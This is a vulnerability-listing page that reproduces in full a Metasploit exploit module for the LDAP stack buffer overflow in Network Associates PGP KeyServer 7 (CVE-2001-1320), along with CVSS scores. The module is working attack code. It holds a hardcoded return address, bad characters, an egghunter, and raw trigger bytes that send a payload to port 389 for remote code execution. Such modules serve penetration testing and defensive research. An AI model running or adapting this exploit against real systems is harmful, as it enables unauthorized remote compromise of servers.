Lucene search

K
metasploitAushack <[email protected]>MSF:EXPLOIT-WINDOWS-LDAP-PGP_KEYSERVER7-
HistoryNov 04, 2010 - 3:44 p.m.

Network Associates PGP KeyServer 7 LDAP Buffer Overflow

2010-11-0415:44:21
www.rapid7.com
20

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

This module exploits a stack buffer overflow in the LDAP service that is part of the NAI PGP Enterprise product suite. This module was tested against PGP KeyServer v7.0. Due to space restrictions, egghunter is used to find our payload - therefore you may wish to adjust WfsDelay.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Network Associates PGP KeyServer 7 LDAP Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the LDAP service that is
          part of the NAI PGP Enterprise product suite. This module was tested
          against PGP KeyServer v7.0. Due to space restrictions, egghunter is
          used to find our payload - therefore you may wish to adjust WfsDelay.
      },
      'Author'         => [ 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2001-1320' ],
          [ 'OSVDB', '4742' ],
          [ 'BID', '3046' ],
          [ 'URL', 'http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/' ],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 450,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ["Universal PGPcertd.exe", { 'Ret' => 0x00436b23 }], # push esp; ret PGPcertd.exe - patrick tested ok 2k/xp
        ],
      'DisclosureDate' => '2001-07-16',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(389)
      ])
  end

  def exploit
    connect

    # - Maximum payload space is 102 so we use EggHunter instead.
    # - The PAYLOAD is put inside an invalid, rejected (but hunt-able) request.

    hunter	= generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
    egg	= hunter[1]

    eggstart = "\x30\x82\x01\xd9\x02\x01\x01\x60\x82\x01\xd2\x02\x01\x03\x04\x82\x01\xc9" # ldapsearch sniff
    eggend = "\x80\x00"

    print_status("Sending trigger and hunter first...")

    buf = "\x30\xfe\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x02\x0a\x01\x00\x02\x01\x00" # PROTOS suite sniff
    buf << [target['Ret']].pack('V') + hunter[0]
    buf << "\x00"

    sock.put(buf)

    disconnect

    connect

    print_status("Sending hunted payload...")
    sock.put(eggstart+egg+eggend)

    handler
    disconnect
  end
end

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

Related for MSF:EXPLOIT-WINDOWS-LDAP-PGP_KEYSERVER7-